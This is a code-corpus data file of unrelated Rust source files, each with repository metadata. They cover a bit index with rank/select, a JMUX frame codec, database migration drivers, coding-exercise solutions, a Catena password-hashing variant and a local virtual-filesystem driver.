40c1c621d3baba83094d0b6ee775c1e67347cac5
Rust
HolisticCoders/shelob-core
/src/add.rs
UTF-8
444
3.140625
3
[ "MIT" ]
permissive
use crate::attribute::Attribute; use crate::node::Node; #[derive(Debug)] pub struct Add { a: Attribute, b: Attribute, } impl Node for Add { fn new() -> Self { Add { a: Attribute::new(), b: Attribute::new(), } } fn evaluate(&self) { println!("Evaluating!") } fn attributes(&self) -> Vec<&Attribute> { vec![&self.a, &self.b] } }
true
1741a78195c5e35cbc5da2ecd7a1cfc3636dbbf2
Rust
pwin/ferricstore
/src/structure/bitindex.rs
UTF-8
7,455
3.015625
3
[ "Apache-2.0" ]
permissive
use byteorder::{ByteOrder,BigEndian}; use super::bitarray::*; use super::logarray::*; use futures::prelude::*; use tokio::prelude::*; // a block is 64 bit, which is the register size on modern architectures // Block size is not tunable, and therefore no const is defined here. /// The amount of 64-bit blocks that go into a superblock. const SBLOCK_SIZE: usize = 52; #[derive(Clone)] pub struct BitIndex<'a> { array: BitArray<'a>, blocks: LogArray<'a>, sblocks: LogArray<'a> } impl<'a> BitIndex<'a> { pub fn from_parts(array: BitArray<'a>, blocks: LogArray<'a>, sblocks: LogArray<'a>) -> BitIndex<'a> { assert!(sblocks.len() == (blocks.len() + SBLOCK_SIZE - 1) / SBLOCK_SIZE); assert!(blocks.len() == (array.len() + 63) / 64); BitIndex { array, blocks, sblocks } } fn block_bits(&self, block_index: usize) -> &[u8] { let bit_index = block_index * 8; &self.array.bits()[bit_index..bit_index+8] } pub fn len(&self) -> usize { self.array.len() } pub fn get(&self, index: u64) -> bool { self.array.get(index as usize) } pub fn rank(&self, index: u64) -> u64 { let block_index = index / 64; let sblock_index = block_index / SBLOCK_SIZE as u64; let block_rank = self.blocks.entry(block_index as usize); let sblock_rank = self.sblocks.entry(sblock_index as usize); let bits = self.block_bits(block_index as usize); assert!(bits.len() == 8); let mut bits_num = BigEndian::read_u64(bits); bits_num >>= 63 - index % 64; // shift out numbers we don't care about let bits_rank = bits_num.count_ones() as u64; sblock_rank - block_rank + bits_rank } fn select_sblock(&self, rank: u64) -> usize { let mut start = 0; let mut end = self.sblocks.len()-1; let mut mid; loop { mid = (start + end)/2; if start == end { break; } let r = self.sblocks.entry(mid); match r < rank { true => start = mid + 1, false => end = mid } } mid } fn select_block(&self, sblock: usize, subrank: u64) -> usize { let mut start = sblock * SBLOCK_SIZE; let mut end = start + SBLOCK_SIZE-1; if end > self.blocks.len() - 1 { end = self.blocks.len() - 1; } let mut mid; // inside a superblock, block subranks cache superblock_rank - sum_i<block_(blockrank_i). // Or another way to think of this, each block subrank specifies where in the superblock // this block starts. if a superblock has a rank of 1000, and the first block has a rank of 50, // the second block will have a subrank of 1000-50=950. // Suppose the second block has a rank of 20, then the third block will have a subrank of 950-20=930. // // To find the proper block, we're trying to find the rightmost block with a subrank greater than the // subrank we're looking for. loop { mid = (start + end + 1)/2; if start == end { break; } let r = self.blocks.entry(mid); match r > subrank { true => start = mid, false => end = mid - 1 } } mid } pub fn select(&self, rank: u64) -> u64 { let sblock = self.select_sblock(rank); let sblock_rank = self.sblocks.entry(sblock); let block = self.select_block(sblock, sblock_rank - rank); let block_subrank = self.blocks.entry(block); let rank_in_block = rank - (sblock_rank - block_subrank); assert!(rank_in_block <= 64); let bits = self.block_bits(block); let mut bits_num = BigEndian::read_u64(bits); let mut tally = rank_in_block; for i in 0..64 { if bits_num & 0x8000000000000000 != 0 { tally -= 1; if tally == 0 { return block as u64 * 64 + i; } } bits_num <<= 1; } panic!("reached end of select function without a result"); } } pub fn build_bitindex<R:'static+AsyncRead,W1:'static+AsyncWrite, W2:'static+AsyncWrite>(bitarray:R, blocks:W1, sblocks:W2) -> Box<dyn Future<Item=(W1, W2),Error=std::io::Error>> { let block_stream = bitarray_stream_blocks(bitarray); // the following widths are unoptimized, but should always be large enough let blocks_builder = LogArrayFileBuilder::new(blocks, 64-(SBLOCK_SIZE*64).leading_zeros() as u8); let sblocks_builder = LogArrayFileBuilder::new(sblocks, 64); // we chunk block_stream into blocks of SBLOCK size for further processing Box::new(block_stream.chunks(SBLOCK_SIZE) .fold((sblocks_builder, blocks_builder, 0), |(sblocks_builder, blocks_builder, tally), chunk| { let block_ranks: Vec<u8> = chunk.iter().map(|b| b.count_ones() as u8).collect(); let sblock_subrank = block_ranks.iter().fold(0u64, |s,&i| s+i as u64); let sblock_rank = sblock_subrank + tally; stream::iter_ok(block_ranks) .fold((blocks_builder, sblock_subrank), |(builder, rank), block_rank| builder.push(rank as u64) .map(move |blocks_builder| (blocks_builder, rank - block_rank as u64))) .and_then(move |(blocks_builder, _)| sblocks_builder.push(sblock_rank) .map(move |sblocks_builder| (sblocks_builder, blocks_builder, sblock_rank))) }) .and_then(|(sblocks_builder, blocks_builder, _)| blocks_builder.finalize() .and_then(|blocks_file| sblocks_builder.finalize() .map(move |sblocks_file| (blocks_file, sblocks_file))))) // TODO it would be better to return the various streams here. However, we have no access to block_stream as it was consumed. } #[cfg(test)] mod tests { use super::*; use tokio_io::io::AllowStdIo; use std::io::Cursor; #[test] pub fn rank_and_select_work() { let ba_builder = BitArrayFileBuilder::new(AllowStdIo::new(Vec::new())); let contents = (0..).map(|n| n % 3 == 0).take(123456); let ba_stored = ba_builder.push_all(stream::iter_ok(contents)) .and_then(|b|b.finalize()) .wait() .unwrap() .into_inner(); let c = Cursor::new(ba_stored.clone()); let index_blocks = AllowStdIo::new(Vec::new()); let index_sblocks = AllowStdIo::new(Vec::new()); let (blocks, sblocks) = build_bitindex(c, index_blocks, index_sblocks) .map(|(b,s)|(b.into_inner(),s.into_inner())) .wait() .unwrap(); let ba = BitArray::from_bits(&ba_stored); let blocks_logarray = LogArray::parse(&blocks).unwrap(); let sblocks_logarray = LogArray::parse(&sblocks).unwrap(); let index = BitIndex::from_parts(ba, blocks_logarray, sblocks_logarray); for i in 0..123456 { assert_eq!(i/3 + 1, index.rank(i)); } for i in 1..(123456/3) { assert_eq!((i-1)*3,index.select(i)); } } }
true
3aa13e6b4d0cb994a01ade97e8f6ae0bf2e8acc3
Rust
Lyr-7D1h/rust_tutorials
/collections/src/main.rs
UTF-8
1,973
3.28125
3
[]
no_license
use std::io; use std::collections::HashMap; fn main() { mean_test(); manage_comp_io(); } fn manage_comp_io() { let mut departments : HashMap<String, Vec<String>> = HashMap::new(); let mut input = String::new(); while !input.eq("e") { input.clear(); println!("'a (name) (department)' to add someone\n'l' to list all employees\n'e' to exit"); io::stdin().read_line(&mut input).expect("Failed to read stdin"); input.truncate(input.len() - 1); println!(""); match input[0..1].as_ref() { "l" => { println!("Employees: {:?}", departments) } "a" => { // let i : String = input.deref(); let mut arguments:Vec<&str> = input.split(" ").collect(); arguments.retain(|&arg| arg != ""); if arguments.len() != 3 { println!("No 2 arguments given"); continue } let employees = departments.entry(String::from(arguments[2])).or_insert(vec![]); employees.push(String::from(arguments[1])); println!("Adding {} to {}", arguments[1], arguments[2]); } "e" => { println!("Exiting Program"); continue } _ => { println!("Unrecognized Command {}", input); } } println!(""); } } fn mean_test() { let numbers1 = vec![4, 5, 6, 2, 5, 3]; let numbers2: Vec<i32> = vec![-2, 23, 1, -50]; let numbers3 = vec![100, 2, 4, 0, 1, 200]; println!("Average: {}", calculate_mean(&numbers1)); println!("Average: {}", calculate_mean(&numbers2)); println!("Average: {}", calculate_mean(&numbers3)); } fn calculate_mean(list: &Vec<i32>) -> i32 { let mut total = 0; for val in list { total += val; } total/list.len() as i32 }
true
63fa5e67d1c8896d8620f001b3c45b9394e8647b
Rust
leshow/exercism
/hackerrank/src/l4sum.rs
UTF-8
1,209
3.65625
4
[]
no_license
// 18. 4Sum // Medium // Given an array nums of n integers and an integer target, are there elements // a, b, c, and d in nums such that a + b + c + d = target? Find all unique // quadruplets in the array which gives the sum of target. // Note: // The solution set must not contain duplicate quadruplets. // Example: // Given array nums = [1, 0, -1, 0, -2, 2], and target = 0. // A solution set is: // [ // [-1, 0, 0, 1], // [-2, -1, 1, 2], // [-2, 0, 0, 2] // ] // it's slow but it works: pub fn four_sum(nums: Vec<i32>, target: i32) -> Vec<Vec<i32>> { use std::collections::HashSet; if nums.len() < 4 { return Vec::new(); } let mut ret = HashSet::new(); for i in 0..(nums.len() - 3) { for j in (i + 1)..(nums.len() - 2) { for k in (j + 1)..(nums.len() - 1) { for t in (k + 1)..nums.len() { if nums[i] + nums[j] + nums[k] + nums[t] == target { let mut ins = vec![nums[i], nums[j], nums[k], nums[t]]; ins.sort(); ret.insert(ins); } } } } } ret.drain().collect::<Vec<_>>() }
true
2781d7ca551ed6f54e7704f861e99cf544777f77
Rust
Devolutions/devolutions-gateway
/crates/jmux-proxy/src/codec.rs
UTF-8
3,915
2.90625
3
[ "Apache-2.0", "MIT" ]
permissive
use anyhow::Context as _; use bytes::BytesMut; use jmux_proto::{Header, Message}; use tokio_util::codec::{Decoder, Encoder}; /// This is a purely arbitrary number pub const MAXIMUM_PACKET_SIZE_IN_BYTES: usize = 4096; pub struct JmuxCodec; impl Decoder for JmuxCodec { type Item = Message; type Error = anyhow::Error; fn decode(&mut self, src: &mut BytesMut) -> Result<Option<Self::Item>, Self::Error> { if src.len() < Header::SIZE { // Not enough data to read length marker. return Ok(None); } // Read length marker let mut length_bytes = [0u8; 2]; length_bytes.copy_from_slice(&src[1..3]); let length = u16::from_be_bytes(length_bytes) as usize; if length > MAXIMUM_PACKET_SIZE_IN_BYTES { anyhow::bail!( "Received JMUX packet is exceeding the maximum packet size: {} (max is {})", length, MAXIMUM_PACKET_SIZE_IN_BYTES ); } if src.len() < length { // The full packet has not arrived yet. // Reserve more space in the buffer (good performance-wise). src.reserve(length - src.len()); // Inform the Framed that more bytes are required to form the next frame. return Ok(None); } // `split_to` is modifying src such that it no longer contains this frame (`advance` could have been used as well) let packet_bytes = src.split_to(length).freeze(); // Parse the JMUX packet contained in this frame let packet = Message::decode(packet_bytes).context("Couldn’t process frame into a valid JMUX packet")?; // Hands the frame Ok(Some(packet)) } } impl Encoder<Message> for JmuxCodec { type Error = anyhow::Error; fn encode(&mut self, item: Message, dst: &mut BytesMut) -> Result<(), Self::Error> { if item.size() > MAXIMUM_PACKET_SIZE_IN_BYTES { anyhow::bail!( "Attempted to send a JMUX packet whose size is too big: {} (max is {})", item.size(), MAXIMUM_PACKET_SIZE_IN_BYTES ); } item.encode(dst)?; Ok(()) } } #[cfg(test)] pub mod tests { use super::*; use bytes::Bytes; use futures_util::StreamExt; use std::pin::Pin; use std::task::{Context, Poll}; use tokio::io::{AsyncRead, ReadBuf}; use tokio_util::codec::FramedRead; struct MockAsyncReader { raw_msg: Vec<u8>, } impl AsyncRead for MockAsyncReader { fn poll_read( mut self: Pin<&mut Self>, _cx: &mut Context<'_>, buf: &mut ReadBuf<'_>, ) -> Poll<std::io::Result<()>> { if buf.remaining() > 0 { let amount = std::cmp::min(buf.remaining(), self.raw_msg.len()); buf.put_slice(&self.raw_msg[0..amount]); self.raw_msg.drain(0..amount); Poll::Ready(Ok(())) } else { Poll::Pending } } } #[tokio::test] async fn jmux_decoder() { let raw_msg = &[ 100, // msg type 0, 34, // msg size 0, // msg flags 0, 0, 0, 1, // sender channel id 0, 0, 4, 0, // initial window size 4, 0, // maximum packet size 116, 99, 112, 58, 47, 47, 103, 111, 111, 103, 108, 101, 46, 99, 111, 109, 58, 52, 52, 51, // destination url: tcp://google.com:443 ]; let expected_message = Message::decode(Bytes::from_static(raw_msg)).unwrap(); let reader = MockAsyncReader { raw_msg: raw_msg.to_vec(), }; let mut framed_reader = FramedRead::new(reader, JmuxCodec); let frame = framed_reader.next().await.unwrap().unwrap(); assert_eq!(expected_message, frame); } }
true
67a6f5f89cff656eefd147a9af2a353b976800b9
Rust
ramn/dbmigrate
/src/drivers/mod.rs
UTF-8
1,269
2.921875
3
[ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference", "MIT" ]
permissive
///! Driver interface and implementations use url::{SchemeType, UrlParser}; use errors::{MigrateResult, invalid_url}; mod mysql; mod postgres; pub trait Driver { fn ensure_migration_table_exists(&self); fn remove_migration_table(&self); fn get_current_number(&self) -> i32; fn set_current_number(&self, number: i32); fn migrate(&self, migration: String, number: i32) -> MigrateResult<()>; } // Creating our own scheme mapper with the default ports fn db_scheme_type_mapper(scheme: &str) -> SchemeType { match scheme { "postgres" => SchemeType::Relative(5432), "mysql" => SchemeType::Relative(3306), _ => SchemeType::NonRelative, } } /// Returns a driver instance depending on url pub fn get_driver(url: &str) -> MigrateResult<Box<Driver>> { // Mysql driver does not allow to connect using a url so we need to parse it let mut parser = UrlParser::new(); parser.scheme_type_mapper(db_scheme_type_mapper); let parsed = parser.parse(url).unwrap(); match parsed.scheme.as_ref() { "postgres" => postgres::Postgres::new(url).map(|d| Box::new(d) as Box<Driver>), "mysql" => mysql::Mysql::new(parsed).map(|d| Box::new(d) as Box<Driver>), _ => Err(invalid_url(url)) } }
true
46fd28969f2de610ec8a3e4b2cc635601d5fdc45
Rust
bqqbarbhg/adventofcode
/2022/05/part2.rs
UTF-8
1,781
3.109375
3
[]
no_license
mod common; use std::{io::{self, BufRead}}; use std::vec::Vec; use regex::Regex; use common::{match_iter, match_capture, ensure_size}; fn get_disjoint<T>(ts: &mut [T], a: usize, b: usize) -> (&mut T, &mut T) { assert!(a != b, "a ({}) and b ({}) must be disjoint", a, b); assert!(a < ts.len(), "a ({}) is out of bounds", a); assert!(b < ts.len(), "b ({}) is out of bounds", b); if a < b { let (al, bl) = ts.split_at_mut(b); (&mut al[a], &mut bl[0]) } else { let (bl, al) = ts.split_at_mut(a); (&mut al[0], &mut bl[b]) } } type Action = (usize, usize, usize); fn main() { let re_top = Regex::new(r" {4}|\[([A-Z])\]").unwrap(); let re_action = Regex::new(r"move (\d+) from (\d+) to (\d+)").unwrap(); let mut stacks: Vec<Vec<char>> = Vec::new(); let mut input = io::stdin().lock().lines() .flat_map(|l| l.ok()); for line in &mut input { if line.trim().is_empty() { break } for (ix, ch) in match_iter::<char>(&re_top, &line).enumerate() { if let Some(ch) = ch { ensure_size(&mut stacks, ix + 1); stacks[ix].push(ch); } } } for stack in &mut stacks { stack.reverse() } for line in input { if let Some((num, src, dst)) = match_capture::<Action>(&re_action, &line) { let (src, dst) = get_disjoint(&mut stacks, src - 1, dst - 1); assert!(num <= src.len(), "Trying to pop {} from {}", num, src.len()); let pos = src.len() - num; dst.extend_from_slice(&src[pos..]); src.truncate(pos); } } let letters = stacks.iter().map(|s| s.last().expect("Stack is empty")); println!("{}", letters.collect::<String>()); }
true
9852efb952fa6c58f4691b4a4e4ff7eb49925193
Rust
Lol3rrr/rust-facomp
/src/frontend/ir/pretty_print.rs
UTF-8
3,154
3.34375
3
[]
no_license
use super::{IRExpression, IRFunction, IRNode}; fn print_expression(prefix: &str, exp: &IRExpression) { let next_prefix = format!("{} ", prefix); match exp { &IRExpression::Value(ref value) => { println!("{}Value: '{:?}'", prefix, value); } &IRExpression::Variable(ref name) => { println!("{}Variable: '{:?}'", prefix, name); } &IRExpression::Operation(ref op, ref exps) => { println!("{}Operation-'{:?}':", prefix, op); for exp in exps { print_expression(&next_prefix, exp); } } &IRExpression::Call(ref name, ref exp) => { println!("{}Call-'{}':", prefix, name); for tmp in exp { print_expression(&next_prefix, tmp); } } &IRExpression::Noop => { println!("{}Noop", prefix); } }; } fn get_next_prefix(current: &str) -> String { format!("{} ", current) } fn print_node(prefix: &str, node: &IRNode) { let next_prefix = get_next_prefix(prefix); match node { &IRNode::Assignment(ref name, ref exp) => { println!("{}Assignment-'{}':", prefix, name); print_expression(&next_prefix, exp); } &IRNode::DeclareVariable(ref name, ref exp) => { println!("{}DeclareVariable-'{}':", prefix, name); println!("{}{:?}", next_prefix, exp); } &IRNode::Conditional(ref comparison, ref nodes) => { println!("{}Conditional:", prefix); println!("{}{:?}", next_prefix, comparison); let n_next_prefix = get_next_prefix(&next_prefix); for tmp in nodes { print_nodes(&n_next_prefix, tmp); } } &IRNode::Loop(ref comparison, ref nodes) => { println!("{}Loop:", prefix); println!("{}{:?}", next_prefix, comparison); let n_next_prefix = get_next_prefix(&next_prefix); for tmp in nodes { print_nodes(&n_next_prefix, tmp); } } &IRNode::Return(ref raw_exp) => { match raw_exp { Some(exp) => { println!("{}Return:", prefix); print_expression(&next_prefix, exp); } None => println!("{}Return", prefix), }; } &IRNode::SingleExpression(ref exp) => { println!("{}Expression:", prefix); print_expression(&next_prefix, exp); } }; } fn print_nodes(prefix: &str, nodes: &[IRNode]) { for node in nodes.iter() { print_node(prefix, node); } } pub fn pretty_print(ir: &std::collections::HashMap<String, IRFunction>) { for (_, func) in ir { println!("Function-'{}':", func.name); println!(" Arguments:"); for param in func.parameters.iter() { println!(" {}: {:?}", param.name, param.param_type); } for statement in func.statements.iter() { println!(" Statement:"); print_nodes(" ", statement); } } }
true
d1f92512b9bbcf0d1f1cb837aaaf833666aab7eb
Rust
sym233/leetcode_problems
/1010. Pairs of Songs With Total Durations Divisible by 60/1010. Pairs of Songs With Total Durations Divisible by 60.rs
UTF-8
339
2.515625
3
[]
no_license
impl Solution { pub fn num_pairs_divisible_by60(time: Vec<i32>) -> i32 { const T: usize = 60usize; let mut arr = [0; T]; let mut count = 0; for &n in time.iter() { let n = n as usize % T; count += arr[(T - n) % T]; arr[n] += 1; } return count } }
true
f3f2589379486646800ccbdc2a97bb6fc3f5d987
Rust
aaronjamesmarshallau/spaghetti
/src/conversion/units/mod.rs
UTF-8
3,319
3
3
[]
no_license
use diesel::backend::Backend; use diesel::deserialize::FromSql; use diesel::serialize::Output; use diesel::sql_types::SmallInt; use diesel::types::ToSql; use serde::{Deserialize, Serialize}; #[derive(Serialize, Deserialize, Debug, Clone, Copy, AsExpression, FromSqlRow)] #[sql_type = "SmallInt"] pub enum UnitOfMeasurement { None, // Units of Mass (Metric) Milligrams, Grams, Kilograms, // Units of Mass (Imperials) Ounces, Pounds, // Units of Volume (general) Teaspoons, Tablespoons, Cups, // Units of Volume (liquid, metric) Millilitres, Litres, // Units of Volume (liquid, imperial) FluidOunces, // Miscellaneous Pinch, Dash, } impl<DB: Backend> ToSql<SmallInt, DB> for UnitOfMeasurement where i16: ToSql<SmallInt, DB>, { fn to_sql<W>(&self, out: &mut Output<W, DB>) -> diesel::serialize::Result where W: std::io::Write, { i16::from(*self).to_sql(out) } } impl<DB: Backend> FromSql<SmallInt, DB> for UnitOfMeasurement where i16: FromSql<SmallInt, DB>, { fn from_sql(bytes: Option<&DB::RawValue>) -> diesel::deserialize::Result<Self> { let small_int = i16::from_sql(bytes)?; Ok(UnitOfMeasurement::from(small_int)) } } impl From<i16> for UnitOfMeasurement { fn from(num: i16) -> UnitOfMeasurement { match num { // Units of Mass (Metric) 1 => UnitOfMeasurement::Milligrams, 2 => UnitOfMeasurement::Grams, 3 => UnitOfMeasurement::Kilograms, // Units of Mass (Imperials) 4 => UnitOfMeasurement::Ounces, 5 => UnitOfMeasurement::Pounds, // Units of Volume (general) 6 => UnitOfMeasurement::Teaspoons, 7 => UnitOfMeasurement::Tablespoons, 8 => UnitOfMeasurement::Cups, // Units of Volume (liquid, metric) 9 => UnitOfMeasurement::Millilitres, 10 => UnitOfMeasurement::Litres, // Units of Volume (liquid, imperial) 11 => UnitOfMeasurement::FluidOunces, // Miscellaneous 12 => UnitOfMeasurement::Pinch, 13 => UnitOfMeasurement::Dash, // None _ => UnitOfMeasurement::None, } } } impl From<UnitOfMeasurement> for i16 { fn from(unit: UnitOfMeasurement) -> i16 { match unit { // Units of Mass (Metric) UnitOfMeasurement::Milligrams => 1, UnitOfMeasurement::Grams => 2, UnitOfMeasurement::Kilograms => 3, // Units of Mass (Imperials) UnitOfMeasurement::Ounces => 4, UnitOfMeasurement::Pounds => 5, // Units of Volume (general) UnitOfMeasurement::Teaspoons => 6, UnitOfMeasurement::Tablespoons => 7, UnitOfMeasurement::Cups => 8, // Units of Volume (liquid, metric) UnitOfMeasurement::Millilitres => 9, UnitOfMeasurement::Litres => 10, // Units of Volume (liquid, imperial) UnitOfMeasurement::FluidOunces => 11, // Miscellaneous UnitOfMeasurement::Pinch => 12, UnitOfMeasurement::Dash => 13, // None _ => 0, } } }
true
051044d6ef65a3a3d24a1da26b4758012ec9410c
Rust
Axect/Woroxide
/src/parser/conv.rs
UTF-8
2,352
2.9375
3
[]
no_license
extern crate puruda; use crate::parser::word::{TotalWords, Word, Words}; use std::fs::File; use std::io::{BufRead, BufReader}; use puruda::*; use rand::prelude::*; #[allow(dead_code)] pub fn smart_to_total_words() -> TotalWords { let mut words_vec: Vec<Words> = Vec::new(); for i in 1..22 { let words = smart_to_words(i); words_vec.push(words); } TotalWords::new(words_vec) } #[allow(dead_code)] pub fn smart_to_words_vec() -> Vec<Words> { let mut words_vec: Vec<Words> = Vec::new(); for i in 1..22 { let words = smart_to_words(i); words_vec.push(words); } words_vec } pub fn smart_to_words(num: usize) -> Words { let chap = num - 1; let word_file = File::open(&format!("word/word_smart/word{}.txt", chap)) .expect(&format!("Can't open word{}.txt", chap)); let mean_file = File::open(&format!("word/word_smart/mean{}.txt", chap)) .expect(&format!("Can't open mean{}.txt", chap)); let word_reader = BufReader::new(word_file); let mean_reader = BufReader::new(mean_file); let mut word_vec: Vec<Word> = Vec::new(); for (word, mean) in word_reader.lines().zip(mean_reader.lines()) { match (word, mean) { (Ok(w), Ok(m)) => { let word = Word::new(w, m); word_vec.push(word); } _ => assert!(false, "Can't parse word & mean"), } } Words::new(num, word_vec) } pub fn toeic_to_words_vec() -> Vec<Words> { let col: Col2<Vec<String>, Vec<String>> = Col2::read_csv("word/toeic_327.csv", ',').expect("Can't read csv"); let words = col.c1(); let means = col.c2(); let mut word_vec: Vec<Word> = Vec::new(); for i in 0 .. words.len() { let word = Word::new(words[i].clone(), means[i].clone()); word_vec.push(word); } word_vec.shuffle(&mut thread_rng()); let mut words_vec: Vec<Words> = Vec::new(); let mut word_iter = word_vec.into_iter(); for i in 30 .. 38 { let mut w_vec: Vec<Word> = Vec::new(); for _j in 0 .. 40 { w_vec.push(word_iter.next().unwrap()); } let ws = Words::new(i, w_vec); words_vec.push(ws); } let w_vec = word_iter.collect::<Vec<Word>>(); let ws = Words::new(38, w_vec); words_vec.push(ws); words_vec }
true
daacdb035f25e4a97c1af6f84d3a4aeead0eb2c4
Rust
medsec/catena-rust
/src/default_instances/dragonfly.rs
UTF-8
1,760
2.90625
3
[]
no_license
//! An implementation of Catena-Dragonfly. This variant of Catena provides //! memory hardness. It should be used in a setting, where the defender can //! afford to allocate much memory without any problems. /// The choices for H, H', F, Γ and Φ for Catena-Dragonfly. /// /// These choices are: /// /// - H: Blake2b /// - H': Blake2b-1 /// - F: BRH(21,2) /// - Γ: SaltMix /// - Φ: Identity function #[derive(Clone, Copy, Debug)] pub struct DragonflyAlgorithms { blake2b_1: ::components::fasthash::blake2b1::Blake2b1, } impl ::catena::Algorithms for DragonflyAlgorithms { fn h (&self, x: &Vec<u8>) -> Vec<u8> { ::components::hash::blake2b::hash(x) } fn h_prime (&mut self, x: &Vec<u8>) -> Vec<u8> { self.blake2b_1.hash(x) } fn reset_h_prime(&mut self) { self.blake2b_1.reset(); } fn gamma (&mut self, garlic:u8, state: Vec<u8>, gamma: &Vec<u8>, k: usize) -> Vec<u8> { ::components::gamma::saltmix::saltmix(self, garlic, state, gamma, k) } fn f (&mut self, garlic: &u8, state: &mut Vec<u8>, lambda: u8, n: usize, k: usize) -> Vec<u8> { ::components::graph::generic_graph::bit_reversal_hash( self, garlic, state, lambda, n, k) } #[allow(unused_variables)] fn phi (&mut self, garlic: u8, state: Vec<u8>, mu: &Vec<u8>, k: usize) -> Vec<u8> { state } } /// Constructor for a Catena-Dragonfly instance. pub fn new() -> ::catena::Catena<DragonflyAlgorithms> { let df_algorithms = DragonflyAlgorithms { blake2b_1: Default::default(), }; ::catena::Catena { algorithms: df_algorithms, vid: "Dragonfly", n: 64, k: 64, g_low: 21, g_high: 21, lambda: 2, } }
true
63ac2ee4b4918832a2c4a9b5d59ce657565771b5
Rust
Vicfred/codeforces-rust
/fancy_fence_270A.rs
UTF-8
487
3.015625
3
[ "BSD-3-Clause" ]
permissive
// https://codeforces.com/problemset/problem/270/A // simple math use std::io; fn main() { let mut t = String::new(); io::stdin() .read_line(&mut t) .unwrap(); let t: i64 = t.trim().parse().unwrap(); for _ in 0..t { let mut a = String::new(); io::stdin() .read_line(&mut a) .unwrap(); let a: i64 = a.trim().parse().unwrap(); if 360%(180-a) == 0 { println!("YES"); } else { println!("NO"); } } }
true
f22e92d99ceec8ef45926b92fb54099eebbc5f3c
Rust
simvux/rust-discord-tui
/src/discord/message.rs
UTF-8
1,819
3.234375
3
[]
no_license
use std::fmt; use termion::color; use tui::style::{Color, Style}; use tui::widgets::Text; pub enum Embed { Link(String), Image(String), Video(String), Nothing, } pub struct Message { pub content: String, pub embed: Embed, pub author: String, } impl Message { pub fn new(author: &str, content: &str, embed: Embed) -> Self { Message { author: author.to_owned(), content: content.to_owned(), embed: embed, } } pub fn author(&self) -> Text { Text::styled(&self.author, Style::default().fg(Color::Green)) } pub fn embed(&self) -> Text { let (link, color) = match &self.embed { Embed::Nothing => return Text::raw("\n"), Embed::Image(link) => (link, Color::Cyan), Embed::Link(link) => (link, Color::Blue), Embed::Video(link) => (link, Color::Red), }; let mut out = String::new(); out.push_str("\n - "); out.push_str(link); out.push_str("\n"); return Text::styled(out, Style::default().fg(color)); } } impl fmt::Display for Message { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!( f, "{}{}: {}{} {}{}", color::Fg(color::Red), self.author, color::Fg(color::Reset), self.content, match &self.embed { Embed::Nothing => String::from(""), Embed::Link(l) => format!("\n - {}{}", color::Fg(color::Green), l), Embed::Image(l) => format!("\n - {}{}", color::Fg(color::LightGreen), l), Embed::Video(l) => format!("\n - {}{}", color::Fg(color::LightGreen), l), }, color::Fg(color::Reset) ) } }
true
0e62debc8ded8d531c8d154a8e5f6da683762e3f
Rust
bgbahoue/amiwo
/src/macros.rs
UTF-8
1,711
3.09375
3
[ "MIT" ]
permissive
//! ## Macros //! //! This module defintes the following macros //! //! - hyper_request! : pseudo function `fn hyper_request(hyper::method::Method, url: hyper::client::IntoUrl, [headers: hyper::header::Headers], [body: Into<hyper::body::Body<'a>>]) -> Result<amiwo::contrib::rocket::ResponseJSON, GenericError> //! - amiwo_macro : pseudo functions //! `fn amiwo_macro(description: ToString, cause: GenericError) -> Result<_, amiwo::GenericError::Compound>` //! `fn amiwo_macro(error) -> Result<_, amiwo::GenericError::Basic>` // ======================================================================= // MACRO DEFINITIONS // ======================================================================= macro_rules! amiwo_error { ($description:expr, $cause:expr) => { Err(GenericError::new_compound($description, $cause)) }; ($error:expr) => { Err(GenericError::Basic($error)) }; } // ======================================================================= // UNIT TESTS // ======================================================================= #[cfg(test)] mod tests { #![allow(non_snake_case)] use std::error::Error; use error::GenericError; #[test] fn macros_test_compound() { let err : Result<(), _> = amiwo_error!("test description", GenericError::Basic("Test error".to_string())); let err = err.unwrap_err(); assert_eq!(err.description(), "test description caused by Test error"); match err.cause() { Some(err) => { assert_eq!(err.description(), "Test error"); assert!(err.cause().is_none()); }, _ => panic!("invalid cause"), } } }
true
61c2006fb64792cc2b66ac8a4067c5c5b6071929
Rust
frankfanslc/evfs
/src/local_fs.rs
UTF-8
3,081
2.984375
3
[ "MIT" ]
permissive
use crate::{EntryType, InternalError, RecvMsg, VfsDriver, VfsError}; use log::*; use std::fs::File; use std::io::Read; use std::path::Path; #[derive(Clone)] pub struct LocalFs { root: String, } impl LocalFs { pub fn new() -> LocalFs { LocalFs { root: String::new(), } } } impl VfsDriver for LocalFs { fn is_remote(&self) -> bool { false } fn can_mount(&self, _target: &str, source: &str) -> Result<(), VfsError> { // special case for source of current dir if source == "" { return Ok(()); } let metadata = std::fs::metadata(source)?; if metadata.is_file() { Err(VfsError::UnsupportedMount { mount: source.into(), }) } else { Ok(()) } } fn new_from_path(&self, path: &str) -> Result<Box<dyn VfsDriver>, VfsError> { Ok(Box::new(LocalFs { root: path.into() })) } /// /// Read a file from the local filesystem. /// TODO: Make the 5 meg size configurable fn load_file( &self, path: &str, send_msg: &crossbeam_channel::Sender<RecvMsg>, ) -> Result<Box<[u8]>, InternalError> { let path = Path::new(&self.root).join(path); let metadata = std::fs::metadata(&path)?; let len = metadata.len() as usize; let mut file = File::open(&path)?; let mut output_data = vec![0u8; len]; trace!("vfs: reading from {:#?}", path); // if file is small than 5 meg we just load it fully directly to memory if len < 5 * 1024 * 1024 { send_msg.send(RecvMsg::ReadProgress(0.0))?; file.read_to_end(&mut output_data)?; } else { // above 5 meg we read in 10 chunks let loop_count = 10; let block_len = len / loop_count; let mut percent = 0.0; let percent_step = 1.0 / loop_count as f32; for i in 0..loop_count { let block_offset = i * block_len; let read_amount = usize::min(len - block_offset, block_len); file.read_exact(&mut output_data[block_offset..block_offset + read_amount])?; send_msg.send(RecvMsg::ReadProgress(percent))?; percent += percent_step; } } //send_msg.send(RecvMsg::ReadDone(output_data.into_boxed_slice()))?; Ok(output_data.into_boxed_slice()) } fn has_entry(&self, path: &str) -> EntryType { let path = Path::new(&self.root).join(path); if let Ok(metadata) = std::fs::metadata(path) { if metadata.is_file() { EntryType::File } else { EntryType::Directory } } else { EntryType::NotFound } } // local fs can't decompress anything fn can_decompress(&self, _data: &[u8]) -> bool { false } // local fs support any file ext fn supports_file_ext(&self, _file_ext: &str) -> bool { true } }
true
83cdd887147ee089c9b9dfa4f42874c3c64f8d47
Rust
ftilde/rust-x86asm
/src/test/instruction_tests/instr_btc.rs
UTF-8
15,390
2.578125
3
[ "MIT" ]
permissive
